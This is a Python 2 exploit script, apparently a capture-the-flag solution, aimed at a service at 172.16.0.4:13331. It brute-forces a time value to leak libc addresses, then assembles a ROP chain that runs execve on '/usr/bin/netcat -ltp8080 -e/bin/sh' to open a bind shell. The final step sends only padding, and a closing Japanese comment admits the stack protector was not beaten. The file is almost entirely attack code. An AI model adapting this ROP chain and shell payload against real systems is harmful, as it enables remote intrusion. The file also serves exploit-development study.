d2.py

#!/usr/bin/env python

import subprocess
import time
from struct import pack, unpack

TIME_RANGE = 10

def readlen(h, l, wait = 0.1, timeout = 3):
    data = ""
    left = l
    for _ in xrange(int(timeout / wait)):
        _data = h.read(left)
        data += _data
        left -= len(_data)
        if left == 0:
            break
        time.sleep(wait)
    return data

def get_client():
    return subprocess.Popen(['nc', '172.16.0.4', '13331'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

offset = None
for os in xrange(-1 * TIME_RANGE, TIME_RANGE):
    client = get_client()
    print '[*] trying offset = %d...' % os
    client.stdin.write('%d\x00\n' % (int(time.time()) + os))
    head = readlen(client.stdout, 1)
    if head == 'c':
        print '[+] hit!'
        msg = 'c' + readlen(client.stdout, 45)
        addr_buf = unpack('<I', msg[16:24].decode('hex'))[0]
        addr_send = unpack('<I', msg[37:45].decode('hex'))[0]
        offset = os
        break
    client.kill() 

p = ''
# Padding goes here

# This ROP Exploit has been generated for a shared object.
# The addresses of the gadgets will need to be adjusted.
# Set this variable to the offset of the shared library
off = addr_send - 0x000f0860

p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ee0) # @ .data
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "/usr" # /usr
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ee4) # @ .data + 4
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "/bin" # /bin
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ee8) # @ .data + 8
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "/net" # /net
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5eec) # @ .data + 12
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "catA" # catA
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5eef) # @ .data + 15
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef0) # @ .data + 16
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "-ltp" # -ltp
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef4) # @ .data + 20
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "8080" # 8080
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef8) # @ .data + 24
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef9) # @ .data + 25
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "-e/b" # -e/b
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5efd) # @ .data + 29
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "in/s" # in/s
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f01) # @ .data + 33
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "hAAA" # hAAA
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f02) # @ .data + 34
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f03) # @ .data + 35
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += pack("<I", off + 0x001a5ee0) # @ .data
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f07) # @ .data + 39
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += pack("<I", off + 0x001a5ef0) # @ .data + 16
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f0b) # @ .data + 43
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += pack("<I", off + 0x001a5ef9) # @ .data + 25
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f0f) # @ .data + 47
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x0001930e) # pop ebx ; ret
p += pack("<I", off + 0x001a5ee0) # @ .data
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f03) # @ .data + 35
p += "AAAA" # padding
p += pack("<I", off + 0x00001a9e) # pop edx ; ret
p += pack("<I", off + 0x001a5f0f) # @ .data + 47
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x0002e285) # int 0x80

client = get_client()
if p.find('\x00') != -1 or p.find('\x0a') != -1:
    print 'ERROR: \\x00 or \\x0a found on p'
    quit()

client.stdin.write('A' * 0x10B)

# sspには勝てなかった